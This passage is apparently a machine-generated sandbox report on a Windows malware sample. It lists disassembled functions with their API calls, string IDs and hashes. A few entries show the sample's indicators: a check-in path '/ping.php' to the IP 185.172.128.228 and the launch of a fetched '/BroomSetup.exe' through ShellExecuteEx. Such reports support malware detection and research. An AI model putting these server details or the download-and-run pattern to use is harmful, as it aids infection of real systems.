                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E01A172A01114BBDB04AF89DC41BAEF769EF89315F10013FF805E3291D3789E4186E9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                                                                        • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                                                                        • Instruction ID: d6c9b49f3576894268384e34a7769fea6536198246bed8f030a338df323358a1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D01ADB2B11125ABE705DF98DC40BAEB7B8FF44714F10812AF805E3282D774AA5086A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 04226509
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 0422651D
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 04226526
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                                                                        • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                                                                        • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                                                                        • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                                                                        • Instruction ID: fcee80554b7bb8f83e96237b758e31ebbb71fac2ff0f3adf96d4edc60fcfcaa5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C501BC31E00228EBDB24DF69E9405DCBFB8FF08710F00812AF805A2160EB70AA45CF90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042D740,00000000,00000000,8B56FF8B,04214002,?,00000004,00000001,0042D740,0000007F,?,8B56FF8B,00000001), ref: 0421B6DD
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0421B766
                                                                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0421B778
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0421B781
                                                                                                                                                                                                                                                                                          • Part of subcall function 04217CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04217CDE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCBE
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040CC0B: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC3A
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040CC0B: ___AdjustPointer.LIBCMT ref: 0040CC55
                                                                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0040CCD3
                                                                                                                                                                                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCE4
                                                                                                                                                                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 0040CD0C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 737400349-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0420CF25
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420CE72: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0420CEA1
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420CE72: ___AdjustPointer.LIBCMT ref: 0420CEBC
                                                                                                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0420CF3A
                                                                                                                                                                                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0420CF4B
                                                                                                                                                                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 0420CF73
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 737400349-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0420ED94,00000000,00000000,?,04217461,0420ED94,00000000,00000000,00000000,?,04217719,00000006,0042E2F8), ref: 042174EC
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,04217461,0420ED94,00000000,00000000,00000000,?,04217719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000,00000364,?,04217052), ref: 042174F8
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,04217461,0420ED94,00000000,00000000,00000000,?,04217719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000), ref: 04217506
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                        • String ID: pow
                                                                                                                                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041DE54: GetOEMCP.KERNEL32(00000000,?,?,0041E0DD,?), ref: 0041DE7F
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0041E122,?,00000000), ref: 0041E2F5
                                                                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,"A,?,?,?,0041E122,?,00000000), ref: 0041E308
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                                        • String ID: "A
                                                                                                                                                                                                                                                                                        • API String ID: 546120528-1838006985
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 042265C0
                                                                                                                                                                                                                                                                                          • Part of subcall function 04204073: __EH_prolog.LIBCMT ref: 04204078
                                                                                                                                                                                                                                                                                          • Part of subcall function 04204073: std::locale::_Init.LIBCPMT ref: 0420409A
                                                                                                                                                                                                                                                                                        • _Deallocate.LIBCONCRT ref: 04226714
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$DeallocateInitstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID: hzB
                                                                                                                                                                                                                                                                                        • API String ID: 2389838984-4102550090
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DF51
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Info
                                                                                                                                                                                                                                                                                        • String ID: $^A
                                                                                                                                                                                                                                                                                        • API String ID: 1807457897-1499568600
                                                                                                                                                                                                                                                                                        • Opcode ID: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                                                                        • Instruction ID: 9b2ab00e05afc5395f67001553a0f729d0bbf79a9b46b691f859092dfb419bf1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46415CB49042589EDB218E25CC80BFABFE9DB49304F1404EEE58A87143D2799AC6CF64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0420CA4A
                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0420CB03
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                                                                        • Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                                                                        • Instruction ID: 3ece605c64782489ba64d92125b8c95b344588acd263c2877fdf4ae55ff647f5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B941A4B0B202099BDF14DF69C880AAEBBF5EF45318F14C266D915AB2D2D771B905CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0042011D,?,00000050,?,?,?,?,?), ref: 0041FF9D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                        • API String ID: 0-711371036
                                                                                                                                                                                                                                                                                        • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                                                                        • Instruction ID: dacf84d8a1ebef4056087089fc013b288552bfb44d7b698df7e4a4e4da77cf20
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F721F472B04101A6D7308B54D901BDBA3A6EB52B24F564077F90AC7301FBBADDCBC258
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,04220384,?,00000050,?,?,?,?,?), ref: 04220204
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                        • API String ID: 0-711371036
                                                                                                                                                                                                                                                                                        • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                                                                        • Instruction ID: 812bf744f4f945736296ebe98081f68931bcc8756a572a4827f75144e80a2751
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B21C462B30226B6E7348E54CF01BA772A6AB94B51F464565EB0AE7104FB32F941C350
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 042033E1
                                                                                                                                                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 04203428
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: __EH_prolog3.LIBCMT ref: 04207FE1
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::_Lockit::_Lockit.LIBCPMT ref: 04207FEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::locale::_Setgloballocale.LIBCPMT ref: 04208007
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: _Yarn.LIBCPMT ref: 0420801D
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 0420805D
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: __EH_prolog.LIBCMT ref: 04203656
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::_Lockit::_Lockit.LIBCPMT ref: 04203665
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: int.LIBCPMT ref: 0420367C
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::locale::_Getfacet.LIBCPMT ref: 04203685
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::_Lockit::~_Lockit.LIBCPMT ref: 042036CC
                                                                                                                                                                                                                                                                                          • Part of subcall function 04201AE6: __CxxThrowException@8.LIBVCRUNTIME ref: 04201B30
                                                                                                                                                                                                                                                                                          • Part of subcall function 04201AE6: std::system_error::system_error.LIBCPMT ref: 04201B3F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Exception@8GetfacetH_prolog3InitSetgloballocaleThrowYarnstd::system_error::system_error
                                                                                                                                                                                                                                                                                        • String ID: =wB
                                                                                                                                                                                                                                                                                        • API String ID: 372095707-727605340
                                                                                                                                                                                                                                                                                        • Opcode ID: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
                                                                                                                                                                                                                                                                                        • Instruction ID: 9cad5336f903adfb5074a58e01d09bb3cfb6f77cf6ea4282fecd13f96a425292
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 262124B1A10A0AAFE714DF6AC185A59FBF0FB09314F50822ED0199BA81D774F964CF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 04204078
                                                                                                                                                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 0420409A
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: __EH_prolog3.LIBCMT ref: 04207FE1
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::_Lockit::_Lockit.LIBCPMT ref: 04207FEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::locale::_Setgloballocale.LIBCPMT ref: 04208007
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: _Yarn.LIBCPMT ref: 0420801D
                                                                                                                                                                                                                                                                                          • Part of subcall function 04207FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 0420805D
                                                                                                                                                                                                                                                                                          • Part of subcall function 042043F0: __EH_prolog.LIBCMT ref: 042043F5
                                                                                                                                                                                                                                                                                          • Part of subcall function 042043F0: std::_Lockit::_Lockit.LIBCPMT ref: 04204404
                                                                                                                                                                                                                                                                                          • Part of subcall function 042043F0: int.LIBCPMT ref: 0420441B
                                                                                                                                                                                                                                                                                          • Part of subcall function 042043F0: std::locale::_Getfacet.LIBCPMT ref: 04204424
                                                                                                                                                                                                                                                                                          • Part of subcall function 042043F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0420446B
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: __EH_prolog.LIBCMT ref: 04203656
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::_Lockit::_Lockit.LIBCPMT ref: 04203665
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: int.LIBCPMT ref: 0420367C
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::locale::_Getfacet.LIBCPMT ref: 04203685
                                                                                                                                                                                                                                                                                          • Part of subcall function 04203651: std::_Lockit::~_Lockit.LIBCPMT ref: 042036CC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Getfacet$H_prolog3InitSetgloballocaleYarn
                                                                                                                                                                                                                                                                                        • String ID: wB
                                                                                                                                                                                                                                                                                        • API String ID: 3898505750-480074513
                                                                                                                                                                                                                                                                                        • Opcode ID: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
